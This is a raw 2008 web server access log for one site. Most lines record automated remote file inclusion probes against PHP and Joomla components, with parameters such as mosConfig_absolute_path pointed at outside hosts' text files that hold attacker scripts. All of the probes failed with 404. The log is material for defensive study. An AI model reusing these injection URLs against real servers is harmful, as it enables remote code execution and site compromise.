213.215.228.10 - - [14/Feb/2008:04:31:01 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:04:31:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.148.178 - - [14/Feb/2008:04:31:45 -0800] "GET /logs//frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.148.178 - - [14/Feb/2008:04:31:46 -0800] "GET //frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://supercue3.com/screenshots//bius/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:32:14 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:32:14 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:32:14 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:04:33:10 -0800] "GET /logs/access_080120.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.179.204 - - [14/Feb/2008:04:34:06 -0800] "GET /bikes/GPS/WeSTOC2006/?D=A HTTP/1.0" 200 833 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:04:35:19 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:04:36:34 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [14/Feb/2008:04:37:43 -0800] "GET /logs/access_080122.log/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.117.225.155 - - [14/Feb/2008:04:41:40 -0800] "GET /includes/functions_portal.php?phpbb_root_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.137.193.66 - - [14/Feb/2008:04:41:46 -0800] "GET /logs/access_080131.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.137.193.66 - - [14/Feb/2008:04:41:46 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.137.193.66 - - [14/Feb/2008:04:41:47 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:04:43:05 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:04:43:22 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:04:43:23 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.215.228.10 - - [14/Feb/2008:04:43:23 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.110.149.61 - - [14/Feb/2008:04:43:38 -0800] "GET /logs/access_071224.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.110.149.61 - - [14/Feb/2008:04:43:38 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.110.149.61 - - [14/Feb/2008:04:43:38 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.110.149.61 - - [14/Feb/2008:04:43:41 -0800] "GET /logs/access_071228.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.137.193.66 - - [14/Feb/2008:04:44:47 -0800] "GET /logs/access_080120.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.37.66.135 - - [14/Feb/2008:04:45:17 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.clanwac.co.uk/tmp/.../.../cmdx9.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.37.66.135 - - [14/Feb/2008:04:45:17 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [14/Feb/2008:04:45:53 -0800] "GET /logs/access_080123.log/includes/functions_portal.php?phpbb_root_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.117.225.155 - - [14/Feb/2008:04:45:53 -0800] "GET /logs/includes/functions_portal.php?phpbb_root_path=http://www.eshqs.com/error.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:04:46:36 -0800] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.16.228.184 - - [14/Feb/2008:04:46:50 -0800] "GET /logs/access_080131.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://nkdb.org//AsaMall/makeup/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.45 - - [14/Feb/2008:04:47:46 -0800] "GET /presto/ HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:04:48:32 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:04:48:33 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:04:48:34 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
83.149.90.29 - - [14/Feb/2008:04:53:30 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
83.149.90.29 - - [14/Feb/2008:04:53:30 -0800] "GET //include.php?path[docroot]=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:55:17 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:55:17 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:04:55:17 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.38.135.73 - - [14/Feb/2008:04:55:21 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:04:56:30 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:04:56:30 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:04:56:43 -0800] "GET /logs/access_071216.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:04:56:56 -0800] "GET /logs/access_080108.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:04:56:56 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.132.77.16 - - [14/Feb/2008:04:57:19 -0800] "GET /logs//include.php?path[docroot]=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
161.132.77.16 - - [14/Feb/2008:04:57:19 -0800] "GET //include.php?path[docroot]=http://www.freewebtown.com/shadowss/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
121.131.42.242 - - [14/Feb/2008:04:58:23 -0800] "GET /logs/access_071225.loghttp://xxuurrryan1918sdman.nm.ru/images/mybabyboy? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /logs/access_080129.log/scan%20administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /logs/access_080129.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /scan%20administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /logs/scan%20administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:04:59:09 -0800] "GET /logs/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:00:11 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:00:11 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.164.34 - - [14/Feb/2008:05:00:12 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:05:01:52 -0800] "GET /mcf.php?content=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:05:01:54 -0800] "GET /logs/mcf.php?content=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:03:55 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:05:05:42 -0800] "GET /logs/access_080126.log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.148.176.11 - - [14/Feb/2008:05:05:42 -0800] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://naimaa.com/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:05:59 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.111.122 - - [14/Feb/2008:05:06:03 -0800] "GET /logs/access_080131.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.sonarama.com/1.0/cache/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:05:07:24 -0800] "GET /logs/access_080201.log//mcf.php?content=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:05:07:24 -0800] "GET //mcf.php?content=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:05:07:24 -0800] "GET /logs//mcf.php?content=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:07:38 -0800] "GET /logs/access_080120.log//akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:07:38 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:07:39 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.191.28.10 - - [14/Feb/2008:05:07:59 -0800] "GET /vwar/vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
64.191.28.10 - - [14/Feb/2008:05:07:59 -0800] "GET /logs/vwar/vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:17 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:18 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:18 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:21 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:21 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:21 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:22 -0800] "GET //akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:22 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:09:22 -0800] "GET /logs//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:09:25 -0800] "GET /logs/access_080103.log//akocomments.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:05:10:01 -0800] "GET /logs/access_080108.log/config.inc.php?path_escape=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:05:10:02 -0800] "GET /config.inc.php?path_escape=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [14/Feb/2008:05:10:02 -0800] "GET /logs/config.inc.php?path_escape=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:10:07 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:10:08 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://www.anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.151.23.213 - - [14/Feb/2008:05:10:12 -0800] "GET /logs/access.log//akocomments.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.66.124.141 - - [14/Feb/2008:05:10:14 -0800] "GET /logs/access_080117.log/mcf.php?content=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.43" "www.dmulk.com"
74.6.26.166 - - [14/Feb/2008:05:11:18 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 50863 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.79.168.42 - - [14/Feb/2008:05:12:07 -0800] "GET /logs/access_080117.log//mcf.php?content=http://collegejacquesprevert.ca/eleves/.plugins/id.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.146.251.123 - - [14/Feb/2008:05:12:20 -0800] "GET /modifyform.html?code=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:05:13:24 -0800] "GET /bikes/GPS/ HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:14:18 -0800] "GET /logs/access_071225.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:14:18 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.119.219.50 - - [14/Feb/2008:05:14:21 -0800] "GET /logs/access_071220.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.103 - - [14/Feb/2008:05:14:36 -0800] "GET /?S=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.64.37.65 - - [14/Feb/2008:05:15:00 -0800] "GET /logs/vwar/vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.64.37.65 - - [14/Feb/2008:05:15:00 -0800] "GET /vwar/vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
69.64.37.65 - - [14/Feb/2008:05:16:41 -0800] "GET /vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.64.37.65 - - [14/Feb/2008:05:16:41 -0800] "GET /logs/vwar.php?vwar=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:05:18:08 -0800] "GET /logs/access_080130.log/scan%20administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
216.65.116.80 - - [14/Feb/2008:05:18:08 -0800] "GET /logs/access_080130.log/errors.php?error=http://www.tiboron.de/phpBB2/files/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:18:33 -0800] "GET /logs/access_080130.log/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:18:33 -0800] "GET /index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.199.102.117 - - [14/Feb/2008:05:18:35 -0800] "GET /logs/index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://insonia.altervista.org/php5/com.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.249.33.227 - - [14/Feb/2008:05:19:05 -0800] "GET /logs/access_080108.log/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
